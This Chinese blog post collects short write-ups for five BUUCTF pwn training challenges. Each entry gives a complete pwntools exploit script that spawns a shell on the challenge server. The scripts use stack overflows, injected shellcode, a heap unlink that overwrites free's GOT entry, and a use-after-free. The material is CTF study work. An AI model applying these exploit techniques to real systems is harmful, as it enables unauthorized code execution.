BUUCTF pwn水题大赏（七）（更新中）

本文链接：https://blog.csdn.net/qq_45878152/article/details/115404613

这篇博客回顾了几个CTF比赛中的Linux漏洞利用题目，包括位栈溢出和简单堆溢出的挑战，如wustctf2020_getshell、mrctf2020_shellcode和[ZJCTF 2019]EasyHeap。每个挑战都提供了exploit代码。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

BUUCTF pwn水题大赏

wustctf2020_getshell
mrctf2020_shellcode
wustctf2020_getshell_2
[ZJCTF 2019]EasyHeap
hitcontraining_uaf

wustctf2020_getshell

简单 32 位栈溢出。
exp：

from pwn import*
context.log_level = 'DEBUG'

p=remote('node3.buuoj.cn',28411)
#p=process('./wustctf2020_getshell')

backdoor = 0x0804851B
payload = 'a'*0x18+'a'*4+p32(backdoor)
p.sendline(payload)

#gdb.attach(p)
p.interactive()

mrctf2020_shellcode

简单 shellcode 。
exp：

from pwn import*
context(arch = 'amd64', os = 'linux', log_level = 'debug')

p=remote('node3.buuoj.cn',29856)
#p=process('./mrctf2020_shellcode')
elf=ELF('./mrctf2020_shellcode')

shellcode=asm(shellcraft.sh())
p.sendline(shellcode)

#gdb.attach(p)
p.interactive()

wustctf2020_getshell_2

32位栈溢出
exp：

from pwn import*
context(arch='amd64',os='linux')
p=remote('node4.buuoj.cn',25179)
#p=process('./wustctf2020_getshell_2')
elf=ELF('./wustctf2020_getshell_2')

system_addr = 0x8048529
sh_addr = 0x08048670

payload ='a'*0x18 + 'a'*0x4+ p32(system_addr) + p32(sh_addr)
p.recv()
p.sendline(payload)

p.interactive()

[ZJCTF 2019]EasyHeap

简单堆溢出。
exp：

from pwn import *
p = process("./easyheap")
#p = remote("node4.buuoj.cn",27446)
elf = ELF("./easyheap")

context.log_level = 'debug'
def add(size,content):
    p.recvuntil("Your choice :")
    p.sendline('1')
    p.recvuntil("Size of Heap : ")
    p.sendline(str(size))
    p.recvuntil("Content of heap:")
    p.sendline(content)

def edit(idx, size, content):
    p.recvuntil("Your choice :")
    p.sendline('2')
    p.recvuntil("Index :")
    p.sendline(str(idx))
    p.recvuntil("Size of Heap : ")
    p.sendline(str(size))
    p.recvuntil("Content of heap : ")
    p.sendline(content)

def delete(idx):
    p.recvuntil("Your choice :")
    p.sendline('3')
    p.recvuntil("Index :")
    p.sendline(str(idx))

#params
heaparray_addr = 0x6020E0
system_plt = elf.plt['system']
free_got = elf.got['free']

#attack
add(0x90,"MMMM")#0
add(0x90,"MMMM")#1
add(0x20,"/bin/sh\x00")#2


fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)
fake_chunk = fake_chunk.ljust(0x90,'M')
fake_chunk += p64(0x90) + p64(0xa0)

edit(0,0x100,fake_chunk)
delete(1)

#gdb.attach(p,"b* 0x400930")

payload = p64(0)*3 + p64(free_got)
edit(0,0x20 ,payload)
edit(0,8,p64(system_plt))
delete(2)

p.interactive()

hitcontraining_uaf

uaf 漏洞。
exp：

from pwn import*
context.log_level = 'debug'
context(arch='amd64',os='linux')
p=remote('node4.buuoj.cn',29704)
#p=process('./hacknote')
elf=ELF('./hacknote')

def add(size,content):
	p.sendlineafter('Your choice :','1')
	p.sendlineafter('Note size :',str(size))
	p.sendlineafter('Content :',content)

def Print(idx):
	p.sendlineafter('Your choice :','3')
	p.sendlineafter('Index :',str(idx))

def delete(idx):
	p.sendlineafter('Your choice :','2')
	p.sendlineafter('Index :',str(idx))

shell = 0x08048945

add(48,'aaaa')
add(48,'bbbb')
delete(0)
delete(1)
add(8,p32(shell))
#gdb.attach(p)
Print(0)

p.interactive()